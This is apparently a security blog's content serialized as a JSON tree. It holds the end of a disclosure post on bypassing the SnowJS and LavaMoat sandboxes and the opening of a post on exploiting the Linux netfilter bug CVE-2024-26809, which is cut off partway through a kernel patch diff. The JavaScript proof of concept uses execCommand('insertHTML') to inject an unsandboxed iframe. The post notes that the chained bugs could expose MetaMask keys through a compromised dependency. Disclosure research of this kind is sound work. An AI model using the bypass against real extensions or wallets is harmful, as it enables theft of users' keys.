Element:",{"type":27,"tag":207,"props":57078,"children":57079},{"style":238},[57080],{"type":33,"value":30305},{"type":27,"tag":207,"props":57082,"children":57083},{"style":1325},[57084],{"type":33,"value":57085},"'innerHTML'",{"type":27,"tag":207,"props":57087,"children":57088},{"style":238},[57089],{"type":33,"value":1123},{"type":27,"tag":207,"props":57091,"children":57092},{"style":1325},[57093],{"type":33,"value":57094},"'outerHTML'",{"type":27,"tag":207,"props":57096,"children":57097},{"style":238},[57098],{"type":33,"value":1123},{"type":27,"tag":207,"props":57100,"children":57101},{"style":1325},[57102],{"type":33,"value":57103},"'insertAdjacentHTML'",{"type":27,"tag":207,"props":57105,"children":57106},{"style":238},[57107],{"type":33,"value":1123},{"type":27,"tag":207,"props":57109,"children":57110},{"style":1325},[57111],{"type":33,"value":57112},"'replaceWith'",{"type":27,"tag":207,"props":57114,"children":57115},{"style":238},[57116],{"type":33,"value":1123},{"type":27,"tag":207,"props":57118,"children":57119},{"style":1325},[57120],{"type":33,"value":57121},"'insertAdjacentElement'",{"type":27,"tag":207,"props":57123,"children":57124},{"style":238},[57125],{"type":33,"value":1123},{"type":27,"tag":207,"props":57127,"children":57128},{"style":1325},[57129],{"type":33,"value":56962},{"type":27,"tag":207,"props":57131,"children":57132},{"style":238},[57133],{"type":33,"value":1123},{"type":27,"tag":207,"props":57135,"children":57136},{"style":1325},[57137],{"type":33,"value":57138},"'before'",{"type":27,"tag":207,"props":57140,"children":57141},{"style":238},[57142],{"type":33,"value":1123},{"type":27,"tag":207,"props":57144,"children":57145},{"style":1325},[57146],{"type":33,"value":56971},{"type":27,"tag":207,"props":57148,"children":57149},{"style":238},[57150],{"type":33,"value":1123},{"type":27,"tag":207,"props":57152,"children":57153},{"style":1325},[57154],{"type":33,"value":57155},"'after'",{"type":27,"tag":207,"props":57157,"children":57158},{"style":238},[57159],{"type":33,"value":1123},{"type":27,"tag":207,"props":57161,"children":57162},{"style":1325},[57163],{"type":33,"value":56953},{"type":27,"tag":207,"props":57165,"children":57166},{"style":238},[57167],{"type":33,"value":21539},{"type":27,"tag":207,"props":57169,"children":57170},{"class":209,"line":892},[57171,57176,57180,57184],{"type":27,"tag":207,"props":57172,"children":57173},{"style":220},[57174],{"type":33,"value":57175}," ShadowRoot:",{"type":27,"tag":207,"props":57177,"children":57178},{"style":238},[57179],{"type":33,"value":30305},{"type":27,"tag":207,"props":57181,"children":57182},{"style":1325},[57183],{"type":33,"value":57085},{"type":27,"tag":207,"props":57185,"children":57186},{"style":238},[57187],{"type":33,"value":21539},{"type":27,"tag":207,"props":57189,"children":57190},{"class":209,"line":1475},[57191,57196,57200,57205],{"type":27,"tag":207,"props":57192,"children":57193},{"style":220},[57194],{"type":33,"value":57195}," HTMLIFrameElement:",{"type":27,"tag":207,"props":57197,"children":57198},{"style":238},[57199],{"type":33,"value":30305},{"type":27,"tag":207,"props":57201,"children":57202},{"style":1325},[57203],{"type":33,"value":57204},"'srcdoc'",{"type":27,"tag":207,"props":57206,"children":57207},{"style":238},[57208],{"type":33,"value":21539},{"type":27,"tag":207,"props":57210,"children":57211},{"class":209,"line":2065},[57212],{"type":27,"tag":207,"props":57213,"children":57214},{"style":238},[57215],{"type":33,"value":23852},{"type":27,"tag":36,"props":57217,"children":57218},{},[57219],{"type":33,"value":57220},"This means that an attacker can't use any of these functions to create an iframe and bypass the snowJS sandbox, because it will detect the new frame and include it in the sandbox.",{"type":27,"tag":36,"props":57222,"children":57223},{},[57224],{"type":33,"value":57225},"Unfortunately, client-side javascript is surprisingly complex with lots of strange behaviours that could be used to bypass the hook security feature.",{"type":27,"tag":58,"props":57227,"children":57229},{"id":57228},"bypassing-snowjs",[57230],{"type":33,"value":57231},"Bypassing SnowJS",{"type":27,"tag":36,"props":57233,"children":57234},{},[57235,57237,57248,57250,57256],{"type":33,"value":57236},"The deprecated ",{"type":27,"tag":47,"props":57238,"children":57241},{"href":57239,"rel":57240},"https://developer.mozilla.org/en-US/docs/Web/API/Document/execCommand",[51],[57242],{"type":27,"tag":84,"props":57243,"children":57245},{"className":57244},[],[57246],{"type":33,"value":57247},"document.execCommand",{"type":33,"value":57249}," function is used to execute commands inside a ",{"type":27,"tag":84,"props":57251,"children":57253},{"className":57252},[],[57254],{"type":33,"value":57255},"contenteditable",{"type":33,"value":57257}," focused context. Despite this being a deprecated function, it is still supported by modern browsers.",{"type":27,"tag":101,"props":57259,"children":57262},{"className":57260,"code":57261,"language":39640,"meta":7,"style":7},"language-html shiki shiki-themes slack-dark","\u003Cdiv id=test contenteditable autofocus>\u003C/div>\n",[57263],{"type":27,"tag":84,"props":57264,"children":57265},{"__ignoreMap":7},[57266],{"type":27,"tag":207,"props":57267,"children":57268},{"class":209,"line":210},[57269,57273,57277,57281,57285,57290,57295,57300,57305,57309],{"type":27,"tag":207,"props":57270,"children":57271},{"style":39633},[57272],{"type":33,"value":9257},{"type":27,"tag":207,"props":57274,"children":57275},{"style":214},[57276],{"type":33,"value":38608},{"type":27,"tag":207,"props":57278,"children":57279},{"style":220},[57280],{"type":33,"value":39713},{"type":27,"tag":207,"props":57282,"children":57283},{"style":238},[57284],{"type":33,"value":10380},{"type":27,"tag":207,"props":57286,"children":57287},{"style":1325},[57288],{"type":33,"value":57289},"test",{"type":27,"tag":207,"props":57291,"children":57292},{"style":220},[57293],{"type":33,"value":57294}," contenteditable",{"type":27,"tag":207,"props":57296,"children":57297},{"style":220},[57298],{"type":33,"value":57299}," autofocus",{"type":27,"tag":207,"props":57301,"children":57302},{"style":39633},[57303],{"type":33,"value":57304},">\u003C/",{"type":27,"tag":207,"props":57306,"children":57307},{"style":214},[57308],{"type":33,"value":38608},{"type":27,"tag":207,"props":57310,"children":57311},{"style":39633},[57312],{"type":33,"value":13274},{"type":27,"tag":36,"props":57314,"children":57315},{},[57316,57318,57324,57326,57331],{"type":33,"value":57317},"After inserting this element to a page, it is possible to use ",{"type":27,"tag":84,"props":57319,"children":57321},{"className":57320},[],[57322],{"type":33,"value":57323},"insertHTML",{"type":33,"value":57325}," command of ",{"type":27,"tag":84,"props":57327,"children":57329},{"className":57328},[],[57330],{"type":33,"value":57247},{"type":33,"value":57332}," to add a non-sandboxed iframe.",{"type":27,"tag":101,"props":57334,"children":57336},{"className":201,"code":57335,"language":200,"meta":7,"style":7},"document.execCommand('insertHTML', false, '\u003Ciframe srcdoc=\"aaa\">');\n",[57337],{"type":27,"tag":84,"props":57338,"children":57339},{"__ignoreMap":7},[57340],{"type":27,"tag":207,"props":57341,"children":57342},{"class":209,"line":210},[57343,57347,57351,57356,57360,57365,57369,57373,57377,57382],{"type":27,"tag":207,"props":57344,"children":57345},{"style":220},[57346],{"type":33,"value":39965},{"type":27,"tag":207,"props":57348,"children":57349},{"style":238},[57350],{"type":33,"value":1041},{"type":27,"tag":207,"props":57352,"children":57353},{"style":1335},[57354],{"type":33,"value":57355},"execCommand",{"type":27,"tag":207,"props":57357,"children":57358},{"style":238},[57359],{"type":33,"value":1343},{"type":27,"tag":207,"props":57361,"children":57362},{"style":1325},[57363],{"type":33,"value":57364},"'insertHTML'",{"type":27,"tag":207,"props":57366,"children":57367},{"style":238},[57368],{"type":33,"value":1123},{"type":27,"tag":207,"props":57370,"children":57371},{"style":214},[57372],{"type":33,"value":15456},{"type":27,"tag":207,"props":57374,"children":57375},{"style":238},[57376],{"type":33,"value":1123},{"type":27,"tag":207,"props":57378,"children":57379},{"style":1325},[57380],{"type":33,"value":57381},"'\u003Ciframe srcdoc=\"aaa\">'",{"type":27,"tag":207,"props":57383,"children":57384},{"style":238},[57385],{"type":33,"value":1455},{"type":27,"tag":58,"props":57387,"children":57389},{"id":57388},"impact-on-lavamoat-scuttling",[57390],{"type":33,"value":57391},"Impact On Lavamoat Scuttling",{"type":27,"tag":36,"props":57393,"children":57394},{},[57395],{"type":33,"value":57396},"As it is recommended to use snowJS integrated with Lavamoat scuttling to prevent bypasses, it is possible to completely bypass the scuttling feature without pre-conditions.",{"type":27,"tag":36,"props":57398,"children":57399},{},[57400,57402,57407,57409,57414],{"type":33,"value":57401},"For the exploit, the only used functions are in ",{"type":27,"tag":84,"props":57403,"children":57405},{"className":57404},[],[57406],{"type":33,"value":39965},{"type":33,"value":57408}," object, which can never be scuttled once it is a non-writable and non-configurable property in ",{"type":27,"tag":84,"props":57410,"children":57412},{"className":57411},[],[57413],{"type":33,"value":44667},{"type":33,"value":57415}," object.",{"type":27,"tag":36,"props":57417,"children":57418},{},[57419,57421,57426],{"type":33,"value":57420},"Consider this example, which runs a scuttled ",{"type":27,"tag":84,"props":57422,"children":57424},{"className":57423},[],[57425],{"type":33,"value":39955},{"type":33,"value":32733},{"type":27,"tag":101,"props":57428,"children":57430},{"className":201,"code":57429,"language":200,"meta":7,"style":7},"document.body.innerHTML = \"\u003Cdiv id=test contenteditable autofocus>\u003C/div>\";\ndocument.getElementById('test').focus();\ndocument.execCommand('insertHTML', false, '\u003Ciframe srcdoc=\"aaa\">');\ndocument.getElementsByTagName('iframe')[0].contentWindow.alert(document.domain);\n",[57431],{"type":27,"tag":84,"props":57432,"children":57433},{"__ignoreMap":7},[57434,57470,57507,57550],{"type":27,"tag":207,"props":57435,"children":57436},{"class":209,"line":210},[57437,57441,57445,57449,57453,57457,57461,57466],{"type":27,"tag":207,"props":57438,"children":57439},{"style":220},[57440],{"type":33,"value":39965},{"type":27,"tag":207,"props":57442,"children":57443},{"style":238},[57444],{"type":33,"value":1041},{"type":27,"tag":207,"props":57446,"children":57447},{"style":220},[57448],{"type":33,"value":39657},{"type":27,"tag":207,"props":57450,"children":57451},{"style":238},[57452],{"type":33,"value":1041},{"type":27,"tag":207,"props":57454,"children":57455},{"style":220},[57456],{"type":33,"value":42228},{"type":27,"tag":207,"props":57458,"children":57459},{"style":226},[57460],{"type":33,"value":229},{"type":27,"tag":207,"props":57462,"children":57463},{"style":1325},[57464],{"type":33,"value":57465}," \"\u003Cdiv id=test contenteditable autofocus>\u003C/div>\"",{"type":27,"tag":207,"props":57467,"children":57468},{"style":238},[57469],{"type":33,"value":241},{"type":27,"tag":207,"props":57471,"children":57472},{"class":209,"line":244},[57473,57477,57481,57485,57489,57494,57498,57503],{"type":27,"tag":207,"props":57474,"children":57475},{"style":220},[57476],{"type":33,"value":39965},{"type":27,"tag":207,"props":57478,"children":57479},{"style":238},[57480],{"type":33,"value":1041},{"type":27,"tag":207,"props":57482,"children":57483},{"style":1335},[57484],{"type":33,"value":42253},{"type":27,"tag":207,"props":57486,"children":57487},{"style":238},[57488],{"type":33,"value":1343},{"type":27,"tag":207,"props":57490,"children":57491},{"style":1325},[57492],{"type":33,"value":57493},"'test'",{"type":27,"tag":207,"props":57495,"children":57496},{"style":238},[57497],{"type":33,"value":28014},{"type":27,"tag":207,"props":57499,"children":57500},{"style":1335},[57501],{"type":33,"value":57502},"focus",{"type":27,"tag":207,"props":57504,"children":57505},{"style":238},[57506],{"type":33,"value":4301},{"type":27,"tag":207,"props":57508,"children":57509},{"class":209,"line":270},[57510,57514,57518,57522,57526,57530,57534,57538,57542,57546],{"type":27,"tag":207,"props":57511,"children":57512},{"style":220},[57513],{"type":33,"value":39965},{"type":27,"tag":207,"props":57515,"children":57516},{"style":238},[57517],{"type":33,"value":1041},{"type":27,"tag":207,"props":57519,"children":57520},{"style":1335},[57521],{"type":33,"value":57355},{"type":27,"tag":207,"props":57523,"children":57524},{"style":238},[57525],{"type":33,"value":1343},{"type":27,"tag":207,"props":57527,"children":57528},{"style":1325},[57529],{"type":33,"value":57364},{"type":27,"tag":207,"props":57531,"children":57532},{"style":238},[57533],{"type":33,"value":1123},{"type":27,"tag":207,"props":57535,"children":57536},{"style":214},[57537],{"type":33,"value":15456},{"type":27,"tag":207,"props":57539,"children":57540},{"style":238},[57541],{"type":33,"value":1123},{"type":27,"tag":207,"props":57543,"children":57544},{"style":1325},[57545],{"type":33,"value":57381},{"type":27,"tag":207,"props":57547,"children":57548},{"style":238},[57549],{"type":33,"value":1455},{"type":27,"tag":207,"props":57551,"children":57552},{"class":209,"line":296},[57553,57557,57561,57566,57570,57574,57579,57583,57588,57593,57597,57601,57605,57609,57613,57617],{"type":27,"tag":207,"props":57554,"children":57555},{"style":220},[57556],{"type":33,"value":39965},{"type":27,"tag":207,"props":57558,"children":57559},{"style":238},[57560],{"type":33,"value":1041},{"type":27,"tag":207,"props":57562,"children":57563},{"style":1335},[57564],{"type":33,"value":57565},"getElementsByTagName",{"type":27,"tag":207,"props":57567,"children":57568},{"style":238},[57569],{"type":33,"value":1343},{"type":27,"tag":207,"props":57571,"children":57572},{"style":1325},[57573],{"type":33,"value":43980},{"type":27,"tag":207,"props":57575,"children":57576},{"style":238},[57577],{"type":33,"value":57578},")[",{"type":27,"tag":207,"props":57580,"children":57581},{"style":232},[57582],{"type":33,"value":1660},{"type":27,"tag":207,"props":57584,"children":57585},{"style":238},[57586],{"type":33,"value":57587},"].",{"type":27,"tag":207,"props":57589,"children":57590},{"style":220},[57591],{"type":33,"value":57592},"contentWindow",{"type":27,"tag":207,"props":57594,"children":57595},{"style":238},[57596],{"type":33,"value":1041},{"type":27,"tag":207,"props":57598,"children":57599},{"style":1335},[57600],{"type":33,"value":39955},{"type":27,"tag":207,"props":57602,"children":57603},{"style":238},[57604],{"type":33,"value":1343},{"type":27,"tag":207,"props":57606,"children":57607},{"style":220},[57608],{"type":33,"value":39965},{"type":27,"tag":207,"props":57610,"children":57611},{"style":238},[57612],{"type":33,"value":1041},{"type":27,"tag":207,"props":57614,"children":57615},{"style":220},[57616],{"type":33,"value":39975},{"type":27,"tag":207,"props":57618,"children":57619},{"style":238},[57620],{"type":33,"value":1455},{"type":27,"tag":58,"props":57622,"children":57624},{"id":57623},"snowjs-patch",[57625],{"type":33,"value":57626},"SnowJS Patch",{"type":27,"tag":36,"props":57628,"children":57629},{},[57630,57632,57639,57641,57648],{"type":33,"value":57631},"Metamask is working on conceptual changes and aiming to integrate SnowJS as a ",{"type":27,"tag":47,"props":57633,"children":57636},{"href":57634,"rel":57635},"https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html#talk",[51],[57637],{"type":33,"value":57638},"browser feature within W3C standards",{"type":33,"value":57640},", with the intention of addressing not only this issue, but also all other well-known issues with SnowJS. ",{"type":27,"tag":47,"props":57642,"children":57645},{"href":57643,"rel":57644},"https://github.com/weizman/Realms-Initialization-Control",[51],[57646],{"type":33,"value":57647},"Here",{"type":33,"value":57649}," is their new proposal.",{"type":27,"tag":28,"props":57651,"children":57653},{"id":57652},"chaining-the-impacts",[57654],{"type":33,"value":57655},"Chaining The Impacts",{"type":27,"tag":36,"props":57657,"children":57658},{},[57659],{"type":33,"value":57660},"We were able to find two vulnerabilities in lavamoat project:",{"type":27,"tag":12719,"props":57662,"children":57663},{},[57664,57669],{"type":27,"tag":1232,"props":57665,"children":57666},{},[57667],{"type":33,"value":57668},"Policy File Bypass",{"type":27,"tag":1232,"props":57670,"children":57671},{},[57672],{"type":33,"value":57673},"Scuttling Bypass",{"type":27,"tag":36,"props":57675,"children":57676},{},[57677],{"type":33,"value":57678},"By combining the exploits, it is possible to completely bypass lavamoat supply-chain protections using a compromised dependency.",{"type":27,"tag":36,"props":57680,"children":57681},{},[57682],{"type":33,"value":57683},"Using Metamask as an example, these exploits could be used to retrieve the encrypted keypair in extension storage. The only precondition would be compromising a NPM dependency.",{"type":27,"tag":28,"props":57685,"children":57686},{"id":10112},[57687],{"type":33,"value":10115},{"type":27,"tag":36,"props":57689,"children":57690},{},[57691],{"type":33,"value":57692},"The vulnerability within the Lavapack module sandboxing, along with the issues we discussed regarding SnowJs and the Scuttling feature, illustrate the complexities of mitigating supply chain attacks within the JavaScript ecosystem. While the lavapack release with a mitigation was available in under two days, the inherent complexity makes designing robust security implementations a challenging task.",{"type":27,"tag":38608,"props":57694,"children":57695},{"style":38610},[57696],{"type":27,"tag":126,"props":57697,"children":57700},{"src":57698,"alt":57699,"style":38616},"/posts/supply-chain-attacks-a-new-era/hello-otter.gif","Hello Otetr",[],{"type":27,"tag":25692,"props":57702,"children":57704},{"className":57703,"dataFootnotes":7},[25695],[57705,57710],{"type":27,"tag":28,"props":57706,"children":57708},{"className":57707,"id":22756},[25700],[57709],{"type":33,"value":25703},{"type":27,"tag":12719,"props":57711,"children":57712},{},[57713],{"type":27,"tag":1232,"props":57714,"children":57715},{"id":37627},[57716,57718,57725,57726],{"type":33,"value":57717},"Excluding SES, which was covered ",{"type":27,"tag":47,"props":57719,"children":57722},{"href":57720,"rel":57721},"https://osec.io/blog/2023-11-01-metamask-snaps",[51],[57723],{"type":33,"value":57724},"in our last article",{"type":33,"value":13740},{"type":27,"tag":47,"props":57727,"children":57729},{"href":37655,"ariaLabel":25805,"className":57728,"dataFootnoteBackref":7},[25807],[57730],{"type":33,"value":25810},{"type":27,"tag":10127,"props":57732,"children":57733},{},[57734],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":57736},[57737,57741,57747,57753,57754,57755],{"id":26226,"depth":244,"text":26229,"children":57738},[57739,57740],{"id":30,"depth":270,"text":34},{"id":54362,"depth":270,"text":54365},{"id":55118,"depth":244,"text":55121,"children":57742},[57743,57744,57745,57746],{"id":55368,"depth":270,"text":55371},{"id":55841,"depth":270,"text":55844},{"id":56497,"depth":270,"text":56500},{"id":56620,"depth":270,"text":56623},{"id":56738,"depth":244,"text":56741,"children":57748},[57749,57750,57751,57752],{"id":56866,"depth":270,"text":56869},{"id":57228,"depth":270,"text":57231},{"id":57388,"depth":270,"text":57391},{"id":57623,"depth":270,"text":57626},{"id":57652,"depth":244,"text":57655},{"id":10112,"depth":244,"text":10115},{"id":22756,"depth":244,"text":25703},"content:blog:2024-06-10-supply-chain-attacks-a-new-era.md","blog/2024-06-10-supply-chain-attacks-a-new-era.md","blog/2024-06-10-supply-chain-attacks-a-new-era",{"_path":57760,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":57761,"description":57762,"author":57763,"image":57764,"date":57766,"isFeatured":19,"tags":57767,"onBlogPage":19,"body":57770,"_type":10152,"_id":68142,"_source":10154,"_file":68143,"_stem":68144,"_extension":10157},"/blog/2024-11-25-netfilter-universal-root-1-day","OtterRoot: Netfilter Universal Root 1-day","A peek into the state of Linux kernel security and the open-source patch-gap. We explore how we monitored commits to find new bug fixes and achieved 0day-like capabilities by exploiting a 1-day vulnerability.","pedro",{"src":57765,"height":16541,"width":13007},"/posts/netfilter-universal-root-1-day/cover.png","2024-11-25",[57768,57769],"kernal","linux",{"type":24,"children":57771,"toc":68110},[57772,57785,57799,57804,57810,57820,57825,57831,57836,57854,57868,57877,57910,57915,57921,57940,57973,57979,57992,58202,58269,58830,58849,59074,59133,59139,59159,59199,59387,59392,59543,59599,59604,60118,60137,60406,60432,60941,61008,61014,61050,61055,61321,61354,61366,61393,61405,61410,61416,61437,61443,61464,61487,62318,62324,62364,62904,62915,62949,63016,63070,63301,63307,63351,63814,63820,63831,63861,63944,63949,63954,63990,64042,64073,64628,64634,64651,64657,64662,64668,64696,64888,64908,64924,65519,65525,65560,65583,65595,65601,65629,66226,66251,67219,67230,67243,67256,68021,68035,68041,68053,68059,68087,68092,68096,68101,68106],{"type":27,"tag":36,"props":57773,"children":57774},{},[57775,57777,57784],{"type":33,"value":57776},"In late March, I attempted to monitor commits in Linux kernel subsystems that are hotspots for exploitable bugs, partially as an experiment to study how feasible it is to maintain LPE/container escape capabilities by patch-gapping/cycling 1-days, but also to submit to the ",{"type":27,"tag":47,"props":57778,"children":57781},{"href":57779,"rel":57780},"https://google.github.io/security-research/kernelctf/rules.html",[51],[57782],{"type":33,"value":57783},"KernelCTF VRP",{"type":33,"value":1041},{"type":27,"tag":36,"props":57786,"children":57787},{},[57788,57790,57797],{"type":33,"value":57789},"During the research, I quickly came across an exploitable bug fixed in netfilter, which was labeled CVE-2024-26809 (originally discovered by ",{"type":27,"tag":47,"props":57791,"children":57794},{"href":57792,"rel":57793},"https://github.com/conlonialC",[51],[57795],{"type":33,"value":57796},"lonial con",{"type":33,"value":57798},") and was able to exploit it in the KernelCTF LTS instance and write a universal exploit that runs across different kernel builds without the need to recompile with different symbols or ROP gadgets.",{"type":27,"tag":36,"props":57800,"children":57801},{},[57802],{"type":33,"value":57803},"In this post, I'll discuss how I exploited a 1day to obtain 0day-like LPE/container escape capabilities for around two months by quickly abusing the patch-gap to write an exploit before the fix could go downstream. I'll also share my journey analyzing the patch to understand the bug, isolate the commit(s) that introduced it, exploit it in the KernelCTF VRP, and, finally, how I developed a universal exploit to target mainstream distros.",{"type":27,"tag":28,"props":57805,"children":57807},{"id":57806},"the-kernel",[57808],{"type":33,"value":57809},"The kernel",{"type":27,"tag":36,"props":57811,"children":57812},{},[57813,57815],{"type":33,"value":57814},"The kernel lies at the very core of an OS; its purpose is not to be a regular application but to create a platform that applications can run on top of. The kernel touches hardware directly to implement everything you can expect from your OS, such as user isolation and permissions, networking, filesystem access, memory management, task scheduling, etc.\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀",{"type":27,"tag":126,"props":57816,"children":57819},{"alt":57817,"src":57818},"image","/posts/netfilter-universal-root-1-day/kernal.png",[],{"type":27,"tag":36,"props":57821,"children":57822},{},[57823],{"type":33,"value":57824},"The kernel exposes an interface that user applications can use to request things they can't do directly (e.g. map some memory to my process' virtual address space, expose some file to my process, open a network socket, etc.). This is called the syscall interface, the main form of passing data from userspace to kernelspace.",{"type":27,"tag":58,"props":57826,"children":57828},{"id":57827},"kernel-exploitation",[57829],{"type":33,"value":57830},"Kernel exploitation",{"type":27,"tag":36,"props":57832,"children":57833},{},[57834],{"type":33,"value":57835},"As the kernel processes requests passed by user applications, it is subject to bugs and security vulnerabilities just as any code would, ranging from logic issues to memory corruptions that attackers can use to hijack the execution in kernel context or escalate privileges in some other way. With that in mind, we can expect the typical kernel exploit to look like this:",{"type":27,"tag":1228,"props":57837,"children":57838},{},[57839,57844,57849],{"type":27,"tag":1232,"props":57840,"children":57841},{},[57842],{"type":33,"value":57843},"Trigger some memory corruption in some kernel subsystem",{"type":27,"tag":1232,"props":57845,"children":57846},{},[57847],{"type":33,"value":57848},"Use it to acquire some stronger primitive (Control-flow, Arb R/W, etc.)",{"type":27,"tag":1232,"props":57850,"children":57851},{},[57852],{"type":33,"value":57853},"Use your current primitive to escalate your privileges (usually by changing the creds of your process or something with similar consequences)",{"type":27,"tag":36,"props":57855,"children":57856},{},[57857,57859,57866],{"type":33,"value":57858},"I strongly recommend reading Lkmidas' Intro to Kernel Exploitation ",{"type":27,"tag":47,"props":57860,"children":57863},{"href":57861,"rel":57862},"https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/",[51],[57864],{"type":33,"value":57865},"blog post",{"type":33,"value":57867}," to become more familiar with the topic.",{"type":27,"tag":28,"props":57869,"children":57871},{"id":57870},"nf_tables",[57872],{"type":27,"tag":84,"props":57873,"children":57875},{"className":57874},[],[57876],{"type":33,"value":57870},{"type":27,"tag":36,"props":57878,"children":57879},{},[57880,57885,57887,57893,57894,57900,57902,57908],{"type":27,"tag":84,"props":57881,"children":57883},{"className":57882},[],[57884],{"type":33,"value":57870},{"type":33,"value":57886}," is a component of the netfilter subsystem of the Linux kernel. It is a package filtering mechanism, and it's the current backend used by tools like iptables and Firewalld. Its internals have been thoroughly discussed by other researchers ",{"type":27,"tag":47,"props":57888,"children":57891},{"href":57889,"rel":57890},"https://pwning.tech/nftables",[51],[57892],{"type":33,"value":1651},{"type":33,"value":1123},{"type":27,"tag":47,"props":57895,"children":57898},{"href":57896,"rel":57897},"https://starlabs.sg/blog/2023/09-nftables-adventures-bug-hunting-and-n-day-exploitation",[51],[57899],{"type":33,"value":1744},{"type":33,"value":57901},". I recommend reading those briefly to understand the hierarchical structure of ",{"type":27,"tag":84,"props":57903,"children":57905},{"className":57904},[],[57906],{"type":33,"value":57907},"nf_table",{"type":33,"value":57909}," objects and how we can manipulate them to create configurable filtering mechanisms.",{"type":27,"tag":36,"props":57911,"children":57912},{},[57913],{"type":33,"value":57914},"For the sake of this blog post I'll omit any details that are not directly related to the vulnerability.",{"type":27,"tag":58,"props":57916,"children":57918},{"id":57917},"transactions",[57919],{"type":33,"value":57920},"Transactions",{"type":27,"tag":36,"props":57922,"children":57923},{},[57924,57926,57931,57933,57938],{"type":33,"value":57925},"A transaction is an interaction that updates ",{"type":27,"tag":84,"props":57927,"children":57929},{"className":57928},[],[57930],{"type":33,"value":57870},{"type":33,"value":57932}," objects/state. It's roughly composed of a batch of operations that modify some ",{"type":27,"tag":84,"props":57934,"children":57936},{"className":57935},[],[57937],{"type":33,"value":57870},{"type":33,"value":57939}," object (adding/removing/editing tables, sets, elements, objects, etc). They are roughly composed of 3 different passes:",{"type":27,"tag":1228,"props":57941,"children":57942},{},[57943,57953,57963],{"type":27,"tag":1232,"props":57944,"children":57945},{},[57946,57951],{"type":27,"tag":12606,"props":57947,"children":57948},{},[57949],{"type":33,"value":57950},"Control plane",{"type":33,"value":57952},"\nPrepare each operation, and if some fail, abort the whole batch; otherwise, commit the entire batch.",{"type":27,"tag":1232,"props":57954,"children":57955},{},[57956,57961],{"type":27,"tag":12606,"props":57957,"children":57958},{},[57959],{"type":33,"value":57960},"Commit path",{"type":33,"value":57962},"\nAfter the control plane, if all succeed, we apply the changes (effectively modify tables, sets, etc.).",{"type":27,"tag":1232,"props":57964,"children":57965},{},[57966,57971],{"type":27,"tag":12606,"props":57967,"children":57968},{},[57969],{"type":33,"value":57970},"Abort path",{"type":33,"value":57972},"\nOnly triggered when some error condition is detected in the control plane; undo actions done during the control plane and skip commitment.",{"type":27,"tag":28,"props":57974,"children":57976},{"id":57975},"vulnerability-details",[57977],{"type":33,"value":57978},"Vulnerability details",{"type":27,"tag":36,"props":57980,"children":57981},{},[57982,57984,57990],{"type":33,"value":57983},"Moving on, let's check out the ",{"type":27,"tag":47,"props":57985,"children":57988},{"href":57986,"rel":57987},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b0e256f3dd2ba6532f37c5c22e07cb07a36031ee",[51],[57989],{"type":33,"value":11509},{"type":33,"value":57991}," that fixed the bug.",{"type":27,"tag":101,"props":57993,"children":57995},{"className":47605,"code":57994,"language":47607,"meta":7,"style":7},"diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c\nindex c0ceea068936a6..df8de509024637 100644\n--- a/net/netfilter/nft_set_pipapo.c\n+++ b/net/netfilter/nft_set_pipapo.c\n@@ -2329,8 +2329,6 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n\n m = rcu_dereference_protected(priv->match, true);\n\n if (m) {\n rcu_barrier();\n \n- nft_set_pipapo_match_destroy(ctx, set, m);\n-\n for_each_possible_cpu(cpu)\n pipapo_free_scratch(m, cpu);\n free_percpu(m->scratch);\n@@ -2342,8 +2340,7 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n if (priv->clone) {\n m = priv->clone;\n \n- if (priv->dirty)\n- nft_set_pipapo_match_destroy(ctx, set, m);\n+ nft_set_pipapo_match_destroy(ctx, set, m);\n \n for_each_possible_cpu(cpu)\n pipapo_free_scratch(priv->clone, cpu);\n",[57996],{"type":27,"tag":84,"props":57997,"children":57998},{"__ignoreMap":7},[57999,58007,58015,58023,58031,58039,58046,58054,58061,58069,58077,58085,58093,58101,58109,58117,58125,58133,58141,58149,58156,58164,58172,58180,58187,58194],{"type":27,"tag":207,"props":58000,"children":58001},{"class":209,"line":210},[58002],{"type":27,"tag":207,"props":58003,"children":58004},{"style":214},[58005],{"type":33,"value":58006},"diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c\n",{"type":27,"tag":207,"props":58008,"children":58009},{"class":209,"line":244},[58010],{"type":27,"tag":207,"props":58011,"children":58012},{"style":238},[58013],{"type":33,"value":58014},"index c0ceea068936a6..df8de509024637 100644\n",{"type":27,"tag":207,"props":58016,"children":58017},{"class":209,"line":270},[58018],{"type":27,"tag":207,"props":58019,"children":58020},{"style":214},[58021],{"type":33,"value":58022},"--- a/net/netfilter/nft_set_pipapo.c\n",{"type":27,"tag":207,"props":58024,"children":58025},{"class":209,"line":296},[58026],{"type":27,"tag":207,"props":58027,"children":58028},{"style":214},[58029],{"type":33,"value":58030},"+++ b/net/netfilter/nft_set_pipapo.c\n",{"type":27,"tag":207,"props":58032,"children":58033},{"class":209,"line":445},[58034],{"type":27,"tag":207,"props":58035,"children":58036},{"style":238},[58037],{"type":33,"value":58038},"@@ -2329,8 +2329,6 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n",{"type":27,"tag":207,"props":58040,"children":58041},{"class":209,"line":867},[58042],{"type":27,"tag":207,"props":58043,"children":58044},{"emptyLinePlaceholder":19},[58045],{"type":33,"value":2062},{"type":27,"tag":207,"props":58047,"children":58048},{"class":209,"line":892},[58049],{"type":27,"tag":207,"props":58050,"children":58051},{"style":238},[58052],{"type":33,"value":58053}," m = rcu_dereference_protected(priv->match, true);\n",{"type":27,"tag":207,"props":58055,"children":58056},{"class":209,"line":1475},[58057],{"type":27,"tag":207,"props":58058,"children":58059},{"emptyLinePlaceholder":19},[58060],{"type":33,"value":2062},{"type":27,"tag":207,"props":58062,"children":58063},{"class":209,"line":2065},[58064],{"type":27,"tag":207,"props":58065,"children":58066},{"style":238},[58067],{"type":33,"value":58068}," if (m) {\n",{"type":27,"tag":207,"props":58070,"children":58071},{"class":209,"line":2092},[58072],{"type":27,"tag":207,"props":58073,"children":58074},{"style":238},[58075],{"type":33,"value":58076}," 